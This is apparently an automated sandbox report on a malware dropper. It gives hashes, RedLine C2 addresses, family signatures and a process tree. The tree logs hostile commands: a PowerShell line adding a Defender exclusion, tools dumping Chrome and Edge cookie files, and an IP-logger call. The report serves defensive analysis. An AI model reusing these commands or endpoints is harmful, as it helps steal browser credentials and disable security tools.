Resubmissions
19-08-2021 18:59
210819-yrzbdtvqln 1018-08-2021 20:25
210818-4hztrzavcs 1018-08-2021 17:24
210818-9p8lqjhwv2 1017-08-2021 06:12
210817-kl4jvaaq7x 1016-08-2021 10:04
210816-nwc3tqkr3a 1016-08-2021 10:04
210816-5r5rafnh7e 1016-08-2021 10:04
210816-kdgh648t5e 1016-08-2021 09:37
210816-9esgfwsmfe 1016-08-2021 08:13
210816-26la9rblgn 1017-08-2021 08:51
210817-w2l5yq2wlnAnalysis
-
max time kernel
96s -
max time network
1312s -
platform
windows11_x64 -
resource
win11 -
submitted
17-08-2021 06:12
General
-
Target
EB7233922891E1DAD0434FBD52623647.exe
-
Size
7.9MB
-
MD5
eb7233922891e1dad0434fbd52623647
-
SHA1
331126b108532ab9a1e932141bff55a38656bce9
-
SHA256
b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
-
SHA512
597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac
Score
10/10
Malware Config
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
redline
Botnet
ww
C2
159.69.178.36:37556
Extracted
Family
redline
Botnet
4
C2
213.166.68.170:16810
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 1 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Raccoon Stealer Payload 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 12 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 11 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
evasion 6 IoCs
evasion.
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 10 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 15 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 32 IoCs
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 23 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 40 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SetWindowsHookEx 30 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdee0446f8,0x7ffdee044708,0x7ffdee0447183⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4848 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2536 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14036639402013758551,18342286866266643697,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:13⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"C:\Users\Admin\Documents\UN3EZFKchIMnv6Dr0leoPKhx.exe"4⤵
-
-
-
C:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exe"C:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exeC:\Users\Admin\Documents\hYoeE5hFqkEuvqhTjmw8MCmM.exe4⤵
-
-
-
C:\Users\Admin\Documents\Oryn26tHXTXfiJOgOUHgEWQC.exe"C:\Users\Admin\Documents\Oryn26tHXTXfiJOgOUHgEWQC.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exe"C:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exeC:\Users\Admin\Documents\HzWqg9gjd5UML3kuFjfEhExk.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\9HA8AUzkSkABD1aTFreqdLQL.exe"C:\Users\Admin\Documents\9HA8AUzkSkABD1aTFreqdLQL.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 2444⤵
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\WHT3zTM8vyl0pN8u26LRRztd.exe"C:\Users\Admin\Documents\WHT3zTM8vyl0pN8u26LRRztd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exe"C:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exeC:\Users\Admin\Documents\W6aLoR23mFu4mCrl5FGlu3hP.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\gQfPleKPYUO3IgUyG6oZeDBE.exe"C:\Users\Admin\Documents\gQfPleKPYUO3IgUyG6oZeDBE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 3044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\2o84zq2hVylVfyFnNpUXwFWj.exe"C:\Users\Admin\Documents\2o84zq2hVylVfyFnNpUXwFWj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 2964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\VXS2zUNs8c1vKDZu8VA8qxnQ.exe"C:\Users\Admin\Documents\VXS2zUNs8c1vKDZu8VA8qxnQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 2524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\lFiB_5K9hnEQX8DzFjlPBY31.exe"C:\Users\Admin\Documents\lFiB_5K9hnEQX8DzFjlPBY31.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
-
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"4⤵
-
-
-
C:\Users\Admin\Documents\qMn_tJPqi2r4PCGE4bJHiVBA.exe"C:\Users\Admin\Documents\qMn_tJPqi2r4PCGE4bJHiVBA.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\lu45MPPlSXDcE87FXpGzebNT.exe"C:\Users\Admin\Documents\lu45MPPlSXDcE87FXpGzebNT.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\test.bat"5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe" -Force4⤵
-
-
C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"4⤵
-
-
-
C:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exe"C:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exeC:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\chqsf1lkE_zkaAtdaYT5l3cV.exe"C:\Users\Admin\Documents\chqsf1lkE_zkaAtdaYT5l3cV.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 2324⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\tc7tx2PYATrMO3q1RR7JDgxh.exe"C:\Users\Admin\Documents\tc7tx2PYATrMO3q1RR7JDgxh.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\4IiTX4vYv1b3qLdHmypJF56x.exe"C:\Users\Admin\Documents\4IiTX4vYv1b3qLdHmypJF56x.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\AlCWTV1YvTp6RqX1w0rqo08a.exe"C:\Users\Admin\Documents\AlCWTV1YvTp6RqX1w0rqo08a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 2964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\HmiIeGHuclxHvR2b2VWhEtfh.exe"C:\Users\Admin\Documents\HmiIeGHuclxHvR2b2VWhEtfh.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\8fsyD3Gw2a2p5RQr7p20wmew.exe"C:\Users\Admin\Documents\8fsyD3Gw2a2p5RQr7p20wmew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exe"C:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exeC:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe"C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe"C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 9765⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Users\Admin\Documents\VUHljWwBSoWgPG29Im1iwYru.exe"C:\Users\Admin\Documents\VUHljWwBSoWgPG29Im1iwYru.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KOE84.tmp\VUHljWwBSoWgPG29Im1iwYru.tmp"C:\Users\Admin\AppData\Local\Temp\is-KOE84.tmp\VUHljWwBSoWgPG29Im1iwYru.tmp" /SL5="$3024C,138429,56832,C:\Users\Admin\Documents\VUHljWwBSoWgPG29Im1iwYru.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-OC4HG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OC4HG.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
